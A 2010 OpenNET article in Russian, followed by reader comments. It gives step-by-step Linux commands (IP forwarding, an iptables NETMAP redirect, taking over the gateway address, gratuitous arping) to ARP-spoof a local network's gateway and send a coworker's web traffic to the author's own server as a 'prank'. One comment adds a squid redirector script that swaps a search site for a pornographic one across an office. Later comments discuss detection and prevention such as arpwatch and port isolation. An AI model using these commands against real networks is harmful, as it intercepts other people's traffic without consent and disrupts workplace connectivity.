The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Подстановка HTTP-трафика определенному компьютеру в локальной сети
Используя нехитрые манипуляции в Linux можно подшутить или удивить соседа по
офису, например отобразив персональное поздравление при попытке открыть соседом
какой-нибудь известного ресурса. Манипуляции проделываются без изменения
конфигурации шлюза, путем поднятия web-сервера на своей машине и
перенаправление на него запросов, через подмену ARP-адреса шлюза в кэше на
машине соседа. Техника действует только в пределах локальной сети.

Включаем на своей машине перенаправление IP-пакетов:

   echo 1 > /proc/sys/net/ipv4/ip_forward

Перенаправляем запросы на 80-порт, заменив адрес назначения в пакете на
192.168.1.200 - локальный IP машины с подставным шлюзом. На локальной машине
должен быть заблаговременно поднят http-сервер с нужной страницей.

   iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200

Добавляем адрес реального шлюза (192.168.1.1) на сетевой интерфейс:

   ip addr add 192.168.1.1/24 dev eth0

Анонсируем смену MAC-адреса шлюза:

   arping -c 3 -A -I eth0 192.168.1.1 

После завершения розыгрыша убираем IP шлюза с локального интерфейса:

   ip addr delete 192.168.1.1/24 dev eth0
   iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200
   ifconfig eth0 down
   ifconfig eth0 up
   arp -d 192.168.1.1

Внимание, описанное действие не следует применять в рабочей сети предприятия,
так как подстановка шлюза на время блокирует работу сети из-за конфликта с
реальным шлюзом.
 
01.10.2010 , Источник: http://blog.ksplice.com/2010/09/hij...
Ключи: arp, gateway, nat, linux / Лицензия: CC-BY
Раздел:    Корень / Администратору / Сетевая подсистема, маршрутизация / Ethernet, ARP, привязка MAC адресов.

Обсуждение [ Линейный режим | Показать все | RSS ]
  • 1.1, Аноним (-), 16:45, 02/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    На предприятиях очень часто в интернет через прокси выходят.
     
     
  • 2.3, pavlinux (ok), 21:52, 02/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Да собственно... Почему бы не поднять squid вместо вебсервака :)

    url_rewrite_program redirector.pl


    #!/usr/bin/perl
            $|=1;
            while (<>) {
                    s@http://www.yandex.ru@http://www.spankwire.com@;
                    print;
            }

    Весь офис будет рад :)

    или вот эту хрень http://squirm.foote.com.au/ прикрутить.

     

  • 1.2, mitiok (??), 18:20, 02/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    наверное подделать популярные зоны в бинде и засунуть розыгрываемого во view было бы более safe
     
     
  • 2.9, Xaionaro (ok), 14:07, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Это требует доступа к bind.
     
     
  • 3.11, Andrey Mitrofanov (?), 15:22, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Это требует доступа к bind.

    Да-да... Или отдельного "полезного" совета ""Подстановка DNS-трафика определенному компьютеру в локальной сети"".

     
     
  • 4.12, Xaionaro (ok), 15:54, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >> Это требует доступа к bind.
    > Да-да... Или отдельного "полезного" совета ""Подстановка DNS-трафика определенному компьютеру
    > в локальной сети"".

    :))

    Но так или иначе будет применяться скорее всего arp-спуфинг, что приведёт к тем же минусам. ;)

     

  • 1.4, Jordan (?), 23:54, 02/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ога, главное всё сделать пока админ не пришол :)
    P.S.
    "через подмену ARP-адреса шлюза в кэше на машине соседа."
    как это реализовать если нет доступа к машине соседа?
    P.S.S.
    Это работоспособно при включеном шлюзе?
     
     
  • 2.6, Дядя Федор (?), 22:21, 03/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Почитайте как работает ARP-кэш. Может снизойдет озарение. Добавлю только, что "подменой" надо заниматься как минимум раз в 30 секунд (анонсировать изменение МАК-адреса шлюза).
     

  • 1.7, User294 (ok), 00:08, 04/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    "How to pwn your corporate network for dummies" :-)
     
  • 1.8, Aquarius (ok), 01:30, 04/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    шлюз будет недоволен, а за ним и админ
     
  • 1.10, keir (ok), 15:13, 04/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В нормально настроенной сети это не провернуть. И вообще, мануал из серии "как делать не надо, чтобы выжить"
     
     
  • 2.13, Xaionaro (ok), 15:58, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > В нормально настроенной сети это не провернуть. И вообще, мануал из серии
    > "как делать не надо, чтобы выжить"

    Ну что такое "нормально настроенная сеть"? Есть вот два cisco-выз свитча, в который втыкается соотвественно два клиента, но работают оба через один и тот же vlan. Что помешает данному хаку? Или что в данной сети настроено не "нормально"?

     
     
  • 3.16, keir (ok), 20:42, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Помешает switchport protected. За каким чертом двум клиентским компам в рабочей обстановке общаться между собой? Правильно, незачем. А если файлы друг-другу захотят передать - для этого используется корпоративная почта/ftp.
     
     
  • 4.17, Xaionaro (ok), 21:03, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Помешает switchport protected. За каким чертом двум клиентским компам в рабочей обстановке
    > общаться между собой? Правильно, незачем. А если файлы друг-другу захотят передать
    > - для этого используется корпоративная почта/ftp.

    Ну в разных подразделениях разных контор - по-разному. Например, в МИФИ нет корпоративного FTP. Почему? Гос. контора, там всё очень сложно.

    Вот взять например моё помещение. В моём помещении стоит одна циска, а в помещении напротив - другая. Там и там работают люди из одного отдела и плотно друг с другом взаимодействуют. Дак вот не вижу смысл запрещать заходить по ssh ко мне с соседнего компьютера (только с моего компьютера можно без затрат большого кол-ва времени достучаться до некоторых ресурсов, а бегать между своим компом и соседним помещенгием тоже не хочется). Тем более, т.к. достаточно проблематично выбить сервер, нередко приходится в качестве тестового компьютера использовать свой рабочий, из-за чего он нередко выступает в роли малого тестового _сервера_.

    Ну или взять общежитие МИФИ. Там студенты свободно обмениваются трафиков. Или вы считаете, что нормальной настройкой студенческой сети - это запретить им общаться друг с другом? Я считаю что это нельзя делать как и из этических соображений, так и из материальных, ибо, например, тот же "retracker.local" в локальной сети экономит нехилый процент канала в Интернет.

    P.S.: В общежитии на один vlan приходится около 50 студентов.

     
     
  • 5.18, keir (ok), 21:13, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >[оверквотинг удален]
    > до некоторых ресурсов, а бегать между своим компом и соседним помещенгием
    > тоже не хочется). Тем более, т.к. достаточно проблематично выбить сервер, нередко
    > приходится в качестве тестового компьютера использовать свой рабочий, из-за чего он
    > нередко выступает в роли малого тестового _сервера_.
    > Ну или взять общежитие МИФИ. Там студенты свободно обмениваются трафиков. Или вы
    > считаете, что нормальной настройкой студенческой сети - это запретить им общаться
    > друг с другом? Я считаю что это нельзя делать как и
    > из этических соображений, так и из материальных, ибо, например, тот же
    > "retracker.local" в локальной сети экономит нехилый процент канала в Интернет.
    > P.S.: В общежитии на один vlan приходится около 50 студентов.

    Извините, но начиналось все с соседа по офису, т.е. речь об организации, которая деньги зарабатывает. Студенческая сеть, конечно, совсем другое дело.

     
     
  • 6.19, Xaionaro (ok), 21:16, 04/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Извините, но начиналось все с соседа по офису, т.е. речь об организации,
    > которая деньги зарабатывает. Студенческая сеть, конечно, совсем другое дело.

    Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим рабочим помещением остаётся в силе :)

     
     
  • 7.22, Дядя Федор (?), 09:18, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим
    > рабочим помещением остаётся в силе :)

    Откройте для себя L3-уровень. И прочитайте - что такое маршрутизация. VLAN, как известно - L2.

     
     
  • 8.25, keir (ok), 23:09, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Кстати говоря, хорошо настроенный и отфильтрованный L2 иногда поудобнее L3 бывае... текст свёрнут, показать
     
  • 8.27, Xaionaro (ok), 02:19, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Я знаю что такое маршрутизация, и знаю где L2, а где L3 И что вы предлагаете З... текст свёрнут, показать
     
     
  • 9.31, Дядя Федор (?), 19:08, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Наверное все-таки терминируемых Ну дык - а в чем тогда проблема Для дос... текст свёрнут, показать
     
     
  • 10.36, Xaionaro (ok), 09:28, 09/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Упс Бывает Перечитал научно-популярного чтива на тему детерминирована ли на... текст свёрнут, показать
     
     
  • 11.37, Дядя Федор (?), 20:55, 09/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Да не в этом дело Можно хоть на каждого сотрудника заводить VLAN И они будут д... текст свёрнут, показать
     
  • 4.24, User294 (ok), 15:53, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > - для этого используется корпоративная почта/ftp.

    Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И даже довольно быстро. А если сервак нагибается - вся контора дружно курит бамбук, радуясь халяве. Поэтому обычно в реалных Ынтерпрайзах используются и ресурсы клиенских машин по мере необходимости.

     
     
  • 5.26, keir (ok), 23:14, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >> - для этого используется корпоративная почта/ftp.
    > Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И
    > даже довольно быстро. А если сервак нагибается - вся контора дружно
    > курит бамбук, радуясь халяве. Поэтому обычно в реалных Ынтерпрайзах используются и
    > ресурсы клиенских машин по мере необходимости.

    Ну, любой сервер может нагнуться, так что в "реальных Ынтерпрайзах" приходится заниматься еще и отказоустойчивостью :) В любом случае сервер лучше - через него можно вести реальный контроль кто-что-куда, а не сидеть в ожидании чуда, пока коллеги друг другу вирусы рассылают :)

     
  • 5.33, XoRe (ok), 19:16, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >> - для этого используется корпоративная почта/ftp.
    > Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И
    > даже довольно быстро.

    Ну у вас и аргументы, уважаемый =)
    Не, ну правда - подсистемы хранения сейчас относительно дешевы.
    Если предприятие такое большое, что документы забивают терабайты, то на 4 sas винта в raid10 + контроллер e200 деньги найдутся.
    А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4 sata винта выходят вообще недорого)

     
     
  • 6.34, User294 (ok), 02:51, 08/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4
    > sata винта выходят вообще недорого)

    Ну да. А потом у таких умников нагибается сервант (любая железка может сломаться) и вся контора радостно курит бамбук. Знаем мы эти совковые Ынтерпрайзы, где на эффективность и безгеморность работы сотрудников всем класть с прибором, зато какойнить бзик по части "как бы чего не сперли" или какой там еще фигне. При том кому надо - все-равно успешно все прут, зато  когда централизованный сервак дает дуба - толпа народа радостно курит бамбук а админы срут кирпичами :). ИМХО зависимость работы всей конторы от 1 сервера - зло. Так, глядя на то какой пипец начинается когда сервак подыхает :)

    Алсо нынче в моде например виртуализация. Представляете себе если програмеры/тестеры/прочий сброд начнут какиенить там временные тестовые виртуалки на много мегазов а то и гигазов каждая на фтпушник лить? И ессно забудут стирать. А на квоты периодически брыкаться когда они работе мешают. И насколько таким макаром места и терпения куль-одминов хватит? :) Вообще, вы имхо по сути извращаетесь, делая из быстрой swiched сети не то что даже более медленную routed, а даже коммутируемую на уровне примерно так L7 сеть. При том "коммутатором" получается фтпушник. Что вообще-то слегка изврат - тормозно и грабельно. Как минимум *удваивается* время на передачу файла по сравнению с шарингом файла напрямую с машины юзера. Для жирных файлов это вообще-то Ж.

     
     
  • 7.35, XoRe (ok), 00:46, 09/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Чет вас понесло.
    Личный негативный опыт?)
     

  • 1.14, Дядя Федор (?), 16:14, 04/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ну, как вариант - APR-кэш может быть сформирован статиком. :) Или где-нить в сети будет стоять arpwatch. Который будет дико материться, обнаружив подобную ситуацию.
     
     
  • 2.20, Аноним (-), 06:30, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Фуууу ... мой arpwatch тихо и интеллигентно залогирует факт, отправит мне письмо да и заблокирует порт на свиче :)

    Как делать? - гугл завалит вариантами ...

     
     
  • 3.21, Дядя Федор (?), 09:17, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Под словом "материться" я как раз таки и не имел в виду "расстрел на месте". :) Обычного логгирования вполне себе достаточно.
     
     
  • 4.28, Аноним (-), 05:04, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Не дядя Фёдор - недостаточно!
    Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу, задрать аларм в NMS ... У менея же порешили что и порт блокировать - вполне резонно. Пока ни одного шутника не уволили ибо шутка получается против себя :)
     
     
  • 5.32, Дядя Федор (?), 19:10, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу,
    > задрать аларм в NMS ... У менея же порешили что и
    > порт блокировать - вполне резонно. Пока ни одного шутника не уволили
    > ибо шутка получается против себя :)

    Ну это уже зависит от уровня "фашизма" админа. :) Во многих случаях вполне обоснованного.

     

  • 1.15, splat_pack (ok), 17:53, 04/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    за такие "шутки" шутник обычно увольняется сходу..
     
     
  • 2.23, XoRe (ok), 11:39, 05/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >Внимание, описанное действие не следует применять в рабочей сети предприятия, так как подстановка шлюза на время блокирует работу сети из-за конфликта с реальным шлюзом.

    Т.е. у всего отдела (или конторы) "внезапно" пропадет интернет.
    Такого вообще не нужно делать, ни дома, ни на работе.

    > за такие "шутки" шутник обычно увольняется сходу..

    Вот-вот.
    Ну или наказывается так, чтобы отбило охоту тратить оплачиваемое время на создание препятствий производственному процессу других людей.

     
     
  • 3.29, d8r8dr (?), 08:54, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    шутка удается с первыми лицами предприятия (и до них это доходит) - админ идет искать работу
     
     
  • 4.30, Аноним (-), 10:12, 06/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > шутка удается с первыми лицами предприятия (и до них это доходит) -
    > админ идет искать работу

    Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ админящий такую сетку пойдет искать работу.

     
     
  • 5.38, axe (??), 16:01, 10/12/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >> шутка удается с первыми лицами предприятия (и до них это доходит) -
    >> админ идет искать работу
    > Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ
    > админящий такую сетку пойдет искать работу.

    может они просто поменяются местами тогда уж?

     


     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:




    Спонсоры:
    Слёрм
    Inferno Solutions
    Hosting by Ihor
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2019 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру